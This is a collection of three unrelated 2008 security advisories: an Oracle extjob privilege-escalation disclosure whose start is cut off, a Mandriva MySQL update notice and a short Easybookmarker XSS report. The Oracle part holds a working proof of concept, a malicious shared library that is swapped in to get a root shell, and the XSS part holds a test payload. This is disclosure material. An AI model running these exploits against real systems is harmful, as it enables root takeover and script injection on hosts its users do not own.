group's name, if a user can execute OS commands from the database (after
an attacker gains DBA privileges by abusing from an sql injection
vulnerability, in example) the user is allowed to execute, modify,
delete or create new files under the ORACLE_HOME directory.
The following are the linked libraries of the extjob binary:
$ ldd $ORACLE_HOME/bin/extjob
linux-gate.so.1 => (0xe000)
libclntsh.so.10.1
=> /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.1
(0xb669d000)
libdl.so.2 => /lib/tls/i686/cmov/libdl.so.2 (0xb6681000)
libm.so.6 => /lib/tls/i686/cmov/libm.so.6 (0xb665f000)
libpthread.so.0 => /lib/tls/i686/cmov/libpthread.so.0
(0xb664d000)
libnsl.so.1 => /lib/tls/i686/cmov/libnsl.so.1 (0xb6638000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb6509000)
libnnz10.so
=> /home/joxean/oracle10g/product/10.1.0/db_2/lib/libnnz10.so
(0xb635f000)
libaio.so.1 => /usr/lib/libaio.so.1 (0xb635c000)
/lib/ld-linux.so.2 (0xb7f95000)
As you can see, 2 Oracle libraries are linked to the extjob binary. A
user in the oracle group can't change the binary "extjob" because it's
owned by root but can change linked libraries to execute arbitrary code
under the privileges of "root". The following is an example of what can
be done:
-- Example with libclntsh.so
$ cat test.c
#include
#include
#include
void __attribute__ ((constructor)) my_init(void)
{
printf("[+] It works! Root shell...\n");
system("/bin/sh");
}
$ cc test.c -fPIC -o test.so -shared
$
mv /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.2
/home/joxean/oracle10g/product/10.2.0/db_2/lib/.libclntsh.so.10.2
$ mv
test.so /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.2
$ $ORACLE_HOME/bin/extjob
[+] It works! Root shell...
sh-3.1#
Notes
-
Despite the privileges needed, the vulnerability can be used in a
multi-stage attack to gain root privileges.
Workaround
--
Remove the SUID root bit from the extjob binary.
Disclaimer
--
The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
Contact
---
Joxean Koret - joxeankoret[at]yahoo[dot]es
References
--
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2613
[ MDVSA-2008:149 ] - Updated mysql packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:149 http://www.mandriva.com/security/ ___ Package : mysql Date: July 19, 2008 Affected: 2008.1 ___ Problem Description: Sergei Golubchik found that MySQL did not properly validate optional data or index directory paths given in a CREATE TABLE statement; as well it would not, under certain conditions, prevent two databases from using the same paths for data or index files. This could allow an authenticated user with appropriate privilege to create tables in one database to read and manipulate data in tables later created in other databases, regardless of GRANT privileges (CVE-2008-2079). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2079 ___ Updated Packages: Mandriva Linux 2008.1: 6782fa8e80d657cc32a784791296136c 2008.1/i586/libmysql15-5.0.51a-8.1mdv2008.1.i586.rpm d38cfb788ab390a22e50c4d8cd88f713 2008.1/i586/libmysql-devel-5.0.51a-8.1mdv2008.1.i586.rpm 17c5413087a43818eb37625415db339c 2008.1/i586/libmysql-static-devel-5.0.51a-8.1mdv2008.1.i586.rpm 725b41649fd161c63087f0e44ec488bb 2008.1/i586/mysql-5.0.51a-8.1mdv2008.1.i586.rpm c6864405d42406bf85f8e2fb08af8793 2008.1/i586/mysql-bench-5.0.51a-8.1mdv2008.1.i586.rpm e6df015114747e50092b6a9d7225e821 2008.1/i586/mysql-client-5.0.51a-8.1mdv2008.1.i586.rpm 5b359172c307e980b7c8d3e409f1f85a 2008.1/i586/mysql-common-5.0.51a-8.1mdv2008.1.i586.rpm b65eb90008f0f329fcd78aa601c941cf 2008.1/i586/mysql-doc-5.0.51a-8.1mdv2008.1.i586.rpm 803c2840d6e56e851d043c21c8d153ba 2008.1/i586/mysql-max-5.0.51a-8.1mdv2008.1.i586.rpm ce4f47ad3c03549aee94d5b88734f6c8 2008.1/i586/mysql-ndb-extra-5.0.51a-8.1mdv2008.1.i586.rpm 3f4013ca6f91d85d00895d58fccb235a 2008.1/i586/mysql-ndb-management-5.0.51a-8.1mdv2008.1.i586.rpm 494932ed64f2813cf0896f23112debc3 2008.1/i586/mysql-ndb-storage-5.0.51a-8.1mdv2008.1.i586.rpm d7c24b1ccf013e14adc943fe90fc11c5 2008.1/i586/mysql-ndb-tools-5.0.51a-8.1mdv2008.1.i586.rpm 0e68ede1df17ebd9dfa4c02ca7205dc1 2008.1/SRPMS/mysql-5.0.51a-8.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 7efe5a4aaf106e5f28118d4f0a6757e5 2008.1/x86_64/lib64mysql15-5.0.51a-8.1mdv2008.1.x86_64.rpm 0793a32b20f398f03580aaa5377e5192 2008.1/x86_64/lib64mysql-devel-5.0.51a-8.1mdv2008.1.x86_64.rpm c3efcca1e7b13bf2d38cc15ac34c3a05 2008.1/x86_64/lib64mysql-static-devel-5.0.51a-8.1mdv2008.1.x86_64.rpm aa1408995eec88602fe6cde92b662814 2008.1/x86_64/mysql-5.0.51a-8.1mdv2008.1.x86_64.rpm ac232e2c080dccf9745f18a901079b7d 2008.1/x86_64/mysql-bench-5.0.51a-8.1mdv2008.1.x86_64.rpm af82fcb4a9c02aa0994015892a0d1297 2008.1/x86_64/mysql-client-5.0.51a-8.1mdv2008.1.x86_64.rpm 7628f598b3d767f0f37f30b80f224db8 2008.1/x86_64/mysql-common-5.0.51a-8.1mdv2008.1.x86_64.rpm ae212a73fda5f0e334d71a0fca4cd8b5 2008.1/x86_64/mysql-doc-5.0.51a-8.1mdv2008.1.x86_64.rpm 734b94f12d8c8b9042780e03d0a2c7df 2008.1/x86_64/mysql-max-5.0.51a-8.1mdv2008.1.x86_64.rpm 53a4ab72777ab8c85a89f8f37ceaecff 2008.1/x86_64/mysql-ndb-extra-5.0.51a-8.1mdv2008.1.x86_64.rpm 8f57766a240e25ae39c11ffba53f5762 2008.1/x86_64/mysql-ndb-management-5.0.51a-8.1mdv2008.1.x86_64.rpm 3e0df3dabd48d33ccfe4322bffe36743 2008.1/x86_64/mysql-ndb-storage-5.0.51a-8.1mdv2008.1.x86_64.rpm 02030eb47df043478edc5886d9706849 2008.1/x86_64/mysql-ndb-tools-5.0.51a-8.1mdv2008.1.x86_64.rpm 0e68ede1df17ebd9dfa4c02ca7205dc1 2008.1/SRPMS/mysql-5.0.51a-8.1mdv2008.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIghjzmqjQ0CJFipgRAg2lAKCPKI1bYFVEu+WtzrBRzIERRkuzvwCfeakB uT2vsaASgbZ7/Mfe3zNpGmo= =aIyr -END PGP SIGNATURE-
Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani
Script : Easybookmarker 40tr
Type : Xss Vulnerability
Method : POST
Alert : High
Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
My Offical Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
Script Download :
http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip
Xss Vulnerability :
Variable : rs
Send Method : POST
Set rs variable with post method in ajaxp_backend.php :
alert('xss') for test vulnerability
http://example/zomplog/ajaxp_backend.php";
method="POST" name="form">
Tnx : God
HTTP://IRCRASH.COM
